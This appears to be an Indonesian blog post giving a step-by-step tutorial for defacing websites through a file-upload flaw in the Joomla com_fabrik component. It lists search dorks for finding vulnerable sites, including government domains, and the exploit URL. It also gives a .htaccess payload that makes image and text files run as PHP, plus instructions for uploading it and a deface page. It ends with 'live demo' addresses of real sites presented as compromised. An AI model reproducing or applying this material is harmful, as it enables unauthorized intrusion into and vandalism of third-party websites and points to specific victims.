siapin bahan dolo gaes :)
1.Dork :
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
inurl:/Com_Fabrik Site:go.id(Selebihnya kebangin lg menggunakan imajinasi, site bisa di ganti jadi .org/.za/.br/.nl pokoknya kembangin biar dpt verawan :v)
2.Exploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
3.Csrf : Touch Me Bep
4..htaccess :)
#Alternate default index page
DirectoryIndex index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .flaatas copy noh trus save jadi .htacces
Nah karna klo kita buat folder awalan . Klo di android kadang ga keliatan :)
Nah Lu klik aja tampilkan file tersembunyi :v hwhw jan jangan isinya b***p asw hwhw
5.Script Deface ubah namanya jadi index.htmlLanjut Tutorial
1.Dorking pake dork di atas/Kembangin lagi aja :)
2.pilih web yang mau di eue :v
3.masukin exploitnya di belakang site Contoh:
www.webtarget.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Klo vlun muncul tulisan ("filepath"null"uri"null) seperti itu lah hwhw gw lupa njir_- intinya "null"
4.Buka Csrfnya Masukin targetnya :)Trus lu upload .htaccess nya dulu
klo berhasil ada tulisan ("filepatch"null"uri"null\/web target") kek gitu lah hwhw
klo gagal muncul tulisan ("null"uri"null) kek awal lu ngendork
nah klo udah berhasil up .htaccess
Trus balik lagi upload script deface elu yang dh di rename jadi index.html :)
Nb.klo gagal nitip aja eak :V klo kurang jelas :'V googling aja Su hwhw
Notice: Btw exploit com_Fabrik ada 2 :V yang satu CSV / apa gw lupa :v
Tapi berhubung gw males exploit ini juga sama aja kok :)
Live Demo
http://www.rwrottemeren.nl
http://thepremiummakers.com
http://rooftruss.co.za
http://bapusipda-jabar.pnri.go.id
http://bpad-sulteng.pnri.go.id
0 Response to "Deface Com_Fabrik/.htacces Live Target"
Post a Comment